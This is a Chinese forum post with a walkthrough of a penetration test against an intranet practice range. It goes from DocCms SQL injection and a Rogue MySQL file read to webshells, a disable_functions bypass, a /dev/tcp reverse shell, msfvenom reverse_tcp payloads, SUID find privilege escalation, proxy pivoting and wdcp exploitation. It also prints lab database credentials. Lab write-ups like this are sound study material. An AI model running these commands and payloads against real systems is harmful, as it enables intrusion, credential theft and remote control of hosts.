电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 516 人浏览分享

记一次内网靶场渗透测试

[复制链接]
516 0
前言

最近在做内网渗透相关姿势点的总结,打了一些靶场,本次内网网络拓扑图如下所示,中等进阶难度。

QQ截图20220628144446.png

测试过程

0x1:信息搜集

访问域名:

1655348663_62aa9db7723ded6124517.png

对域名解析的ip进行端口扫描:

nmap -sS --open -Pn -p- -v 192.168.0.122

QQ截图20220628145018.png

对网站进行目录扫描和指纹识别发现网站使用的是DocCms 2016 x1.0

666699.png

0x2:漏洞利用

网上搜索doccms 2016历史漏洞,说搜索功能处参数keyword存在sql注入,使用url二次编码进行绕过。

666698.png

成功获取到网站admin账号密码但无法进行解密:

66698.png

从网上下载源码,发现/setup/checkdb.php文件可以连接远程的mysql,所以可以利用mysql的bug读取文件。

66696.png

使用Rogue-MySql-Server读取文件:

66695.png

http://www.ddd4.com/setup/checkdb.php?dbname=mysql&uname=root&pwd=123456&dbho
st=192.168.0.109&action=chkdb 这里获取到了网站的物理路径。

259.png

查看mysql.log文件,成功读取到/etc/passwd:

226.png

修改server.py文件中读取文件的路径为:

/www/wwwroot/www.ddd4.com/config/doc-config-cn.php

222.png

再次查看mysql.log获取到数据库名称、用户名、密码:
www_ddd4.com

www_ddd4_com

x4ix6ZrM7b8nFYHn

221.png

前面端口扫描发现目标机器的3306端口是开放的,直接进行连接:

220.png

连接成功后,替换网站管理员admin账户的密码,查看admin/login.php,发现对密码使用加密算法进行了加密。

219.png

我们来使用加密算法class.docencryption.php,对123456进行加密。

218.png

4a8dq8y3e7c4a8d09csy9520943dcl64943941se10adc394ujba59abbe5ne057xf20f8y3e7cpwd
将加密后的值进行替换。

216.png

使用密码123456登录到后台:

215.png

通过网站查找历史漏洞,可以使用模版来getshell:

212.png

211.png

这里刚开始写入普通的一句话木马,使用蚁剑连接,显示为空,但是查看phpinfo文件并没有将eval函数写入
到disable_function当中,换了冰蝎可以连接成功。

210.png

但是无法执行命令,查看disable_function,禁用了很多函数。

209.png

这里使用脚本进行绕过,将文件夹里的.so文件与.php文件上传到网站的目录下面:

208.png

然后访问执行命令:http://www.ddd4.com/bypass_disablefunc.php?cmd=id&outpath=/tmp/x
x&sopath=/www/wwwroot/www.ddd4.com/bypass_disablefunc_x64.so

206.png

直接使用sh反弹shell,反弹成功但是执行命令无反应:/bin/sh -i >& /dev/tcp/192.168.0.2/3333 0>&1

202.png

使用matespolite生成木马文件:

msfvenom -p

linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 -f elf >

/home/kali/Desktop/haha

将木马文件上传到目标主机,赋权后执行:

201.png

msf返回一个meterpreter

200.png

使用python返回一个交互式shell

199.png

查看文件获取到第一个flag

198.png

0x3:提权

1)使用find进行提权

使用命令find / -type f -perm -u=s 2>/dev/null 发现可以利用find命令来进行提权:

196.png

find . -exec whoami \; -quit 提权成功:

118.png

2)宝塔提权

翻看文件发现宝塔的账户密码:

116.png

登录到宝塔上,使用计划任务进行提权:

112.png

111.png

成功获取到第二个flag:

19.png

0x4:内网渗透

使用现在的root权限的shell来运行前面我们生产的木马文件,来获取一个meterpreter。

18.png

查看路由和hosts文件,发现存在10.10.10.144主机:

16.png

添加路由:

Run autoroute -s 10.10.10.0/24

Run autoroute -p

13.png

设置代理:

12.png

可以访问http://10.10.10.145:8888说明代理搭建成功。

11.png

使用msf自带的模块对10.10.10.144进行端口扫描,发现开放了21、22、80、8080端口:

10.png

浏览器代理访问www.ddd5.com弱口令进入后台,此站点使用的是emlog,网上搜索历史漏洞发现后台可以通过上传模版来getshell。

从网上下载一个emlog模版,然后在文件里新建一个php一句话。

9.png

然后将压缩文件进行上传安装:

8.png

上传成功后,一句话文件的位置为/content/templates/beginning/haha.php。

6.png

http://www.ddd5.com/content/templates/beginning/haha.php?cmd=id来执行系统命令。

5.png

访问8080端口:

4.png

使用默认密码wdlinux.cn无法登录,对目录扫描发现存在phpmyadmin使用默认密码登录成功查看
wdcpdb数据库,获取到admin用户的密码。

3.png

对密码进行md5解密获取到明文密码:

2.png

使用密码进行登录,发现显示登录超时,网上说是时间不同步导致的。

1.png

使用前面的一句话来查看系统当前的时间:

0.png

因为权限不够,无法修改目标机器的时间,但可以修改自己本地系统时间然后成功登录。

搜索wdcp利用方法,发现可以执行系统命令,当前用户为root。

00.png

但是无法使用bash进行反弹,然后考虑的是使用msfvenoom生产一个正向的木马文件,然后执行木马文件来
上线msf,最后发现也是不行被拦截。

000.png

在安全管理-->ssh管理处生成密码,并将密钥下载下来:

QQ截图20220628161241.png

利用proxychains使用ssh直接连接获取第三个falg。

QQ截图20220628161329.png

总结

在测试过中发现,doccms后台也可以使用写入配置文件来拿shell,然后在绕过disable_functions 时,刚开始想的
是直接使用蚁剑的插件来绕过,但失败了,只好手工来绕过disable_functions,也学习了WDCP的利用方法。

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.